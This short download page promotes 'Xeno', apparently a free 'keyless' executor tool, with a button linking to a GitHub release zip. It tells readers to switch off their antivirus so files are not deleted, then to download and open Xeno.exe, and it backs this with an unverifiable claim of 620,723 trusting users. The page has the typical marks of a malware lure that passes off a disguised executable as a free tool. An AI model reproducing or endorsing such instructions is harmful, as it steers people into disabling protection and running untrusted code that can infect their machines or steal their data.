<p>
  <a href="https://github.com/OWNER/REPO/releases/download/v1.0/folder.zip" style="display:inline-block;padding:8px 12px;border-radius:6px;background:#2ea44f;color:#fff;text-decoration:none;">
    Download folder.zip
  </a>
</p>

100% Free & Keyless
make sure your anti virus is off or some files might get deleted
Download and open the Xeno.exe file 
Any Help Write down in the comments for any problems I will respond in under an hour
No keys, no payments, no restrictions. Xeno is completely free to use and trusted by 620,723 users worldwide.
